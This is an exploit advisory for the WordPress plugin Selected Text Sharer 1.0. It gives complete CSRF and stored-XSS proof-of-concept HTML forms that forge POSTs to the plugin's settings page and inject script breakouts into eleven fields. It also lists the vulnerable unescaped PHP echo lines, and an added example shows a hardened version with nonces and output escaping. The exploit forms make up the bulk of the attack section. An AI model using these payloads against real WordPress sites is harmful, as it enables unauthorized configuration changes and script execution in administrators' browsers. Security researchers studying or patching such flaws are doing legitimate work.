WordPress Selected Text Sharer 1.0 CSRF / XSS
Posted on 07 August 2016
====================
[+] Exploit Title : WP Selected Text Sharer CSRF/XSS
[+] Exploit Author : bl4ck_mohajem
[+] Date : 2015/09/24
[+] Version : 1.0
[+] Tested on : Elementary Os
[+] Vendor Homepage : http://www.aakashweb.com/wordpress-plugins/wp-selected-text-sharer/
=============================================================================
[+] Exploit CSRF :

<form method="post" action="http://localhost/wp-admin/options-general.php?page=wp-selected-text-sharer%2Fwp-selected-text-sharer.php">
<input name="wpsts_title" type="hidden" value='CSRF 1'>
<input name="wpsts_lists" type="hidden" value='CSRF 2'>
<input name="wpsts_borderColor" type="hidden" value='CSRF 3'>
<input name="wpsts_bgColor" type="hidden" value='CSRF 4'>
<input name="wpsts_titleColor" type="hidden" value='CSRF 5'>
<input name="wpsts_hoverColor" type="hidden" value='CSRF 6'>
<input name="wpsts_textColor" type="hidden" value='CSRF 7'>
<input name="wpsts_extraClass" type="hidden" value='CSRF 8'>
<input name="wpsts_truncateChars" type="hidden" value='CSRF 9'>
<input name="wpsts_element" type="hidden" value='CSRF 10'>
<input name="wpsts_bitly" type="hidden" value='CSRF 11'>
<input type="submit" name="wpsts_submit" value="Update">
</form>

=============================================================================
[+] Exploit XSS :

<form method="post" action="http://localhost/wp-admin/options-general.php?page=wp-selected-text-sharer%2Fwp-selected-text-sharer.php">
<input name="wpsts_title" type="hidden" value='"><script>alert(/XSS 1/)</script>'>
<input name="wpsts_lists" type="hidden" value='</textarea><script>alert(/XSS 2/)</script>'>
<input name="wpsts_borderColor" type="hidden" value='"><script>alert(/XSS 3/)</script>'>
<input name="wpsts_bgColor" type="hidden" value='"><script>alert(/XSS 4/)</script>'>
<input name="wpsts_titleColor" type="hidden" value='"><script>alert(/XSS 5/)</script>'>
<input name="wpsts_hoverColor" type="hidden" value='"><script>alert(/XSS 6/)</script>'>
<input name="wpsts_textColor" type="hidden" value='"><script>alert(/XSS 7/)</script>'>
<input name="wpsts_extraClass" type="hidden" value='"><script>alert(/XSS 8/)</script>'>
<input name="wpsts_truncateChars" type="hidden" value='"><script>alert(/XSS 9/)</script>'>
<input name="wpsts_element" type="hidden" value='"><script>alert(/XSS 10/)</script>'>
<input name="wpsts_bitly" type="hidden" value='"><script>alert(/XSS 11/)</script>'>
<input type="submit" name="wpsts_submit" value="Update">
</form>

=============================================================================
[+] Vulnerable Code :

372:<input name="wpsts_title" id="wpsts_title" type="text" value="<?php echo $wpsts_title; ?>"/>
388:<textarea name="wpsts_lists" id="wpsts_lists"><?php echo $wpsts_lists; ?></textarea>
403:<input name="wpsts_borderColor" id="wpsts_borderColor" class="color" type="text" value="<?php echo $wpsts_borderColor; ?>"/>
407:<input name="wpsts_bgColor" id="wpsts_bgColor" class="color" type="text" value="<?php echo $wpsts_bgColor; ?>"/>
411:<input name="wpsts_titleColor" id="wpsts_titleColor" class="color" type="text" value="<?php echo $wpsts_titleColor; ?>"/>
415:<input name="wpsts_hoverColor" id="wpsts_hoverColor" class="color" type="text" value="<?php echo $wpsts_hoverColor; ?>"/>
419:<input name="wpsts_textColor" id="wpsts_textColor" class="color" type="text" value="<?php echo $wpsts_textColor; ?>"/>
423:<input name="wpsts_extraClass" type="text" value="<?php echo $wpsts_extraClass; ?>"/>
448:<input name="wpsts_truncateChars" type="text" value="<?php echo $wpsts_truncateChars; ?>"/>
454:<input name="wpsts_element" type="text" value="<?php echo $wpsts_element; ?>"/>
458:<input name="wpsts_bitly" type="text" value="<?php echo $wpsts_bitly; ?>" size="40"/>

=================
################################################
tnx: ehsan cod3r - Milad hacking - n1arash - malah sky - bl4ck_li0n
###########################################
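
A hardened form of the settings page, as an added example (not the plugin's own code and not the vendor's fix): the save handler requires a capability and a nonce, so the forged POST above is rejected, and every stored value is escaped on output, so the quote-breaking and </textarea> values stay inert. The wpsts_example_* function names, the nonce action and field name, and the use of get_option()/update_option() for storage are assumptions; the page does not show how the plugin saves its settings.

```php
<?php
// Added example: runs inside WordPress (wp-admin); not the plugin's code.
// Hypothetical names: the wpsts_example_* functions, nonce action and nonce field.
const WPSTS_EXAMPLE_FIELDS = array(
    'wpsts_title', 'wpsts_borderColor', 'wpsts_bgColor', 'wpsts_titleColor',
    'wpsts_hoverColor', 'wpsts_textColor', 'wpsts_extraClass',
    'wpsts_truncateChars', 'wpsts_element', 'wpsts_bitly',
);

// Call at the top of the settings page callback, before any output.
function wpsts_example_save() {
    if ( ! isset( $_POST['wpsts_submit'] ) ) {
        return;
    }
    // Only administrators may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies unless the POST carries a valid nonce for this user and action,
    // so a form hosted on another origin cannot change the settings.
    check_admin_referer( 'wpsts_example_save', 'wpsts_example_nonce' );

    foreach ( WPSTS_EXAMPLE_FIELDS as $name ) {
        $raw = isset( $_POST[ $name ] ) ? wp_unslash( $_POST[ $name ] ) : '';
        update_option( $name, sanitize_text_field( $raw ) ); // strips tags
    }
    $lists = isset( $_POST['wpsts_lists'] ) ? wp_unslash( $_POST['wpsts_lists'] ) : '';
    update_option( 'wpsts_lists', sanitize_textarea_field( $lists ) );
}

function wpsts_example_fields() {
    ?>
    <form method="post">
        <?php wp_nonce_field( 'wpsts_example_save', 'wpsts_example_nonce' ); ?>
        <?php foreach ( WPSTS_EXAMPLE_FIELDS as $name ) : ?>
            <input name="<?php echo esc_attr( $name ); ?>" type="text"
                   value="<?php echo esc_attr( get_option( $name, '' ) ); ?>"/>
        <?php endforeach; ?>
        <textarea name="wpsts_lists"><?php
            echo esc_textarea( get_option( 'wpsts_lists', '' ) );
        ?></textarea>
        <input type="submit" name="wpsts_submit" value="Update">
    </form>
    <?php
}
```

Escaping on output is the control that matters for values already stored before the fix; sanitizing on save only covers new submissions.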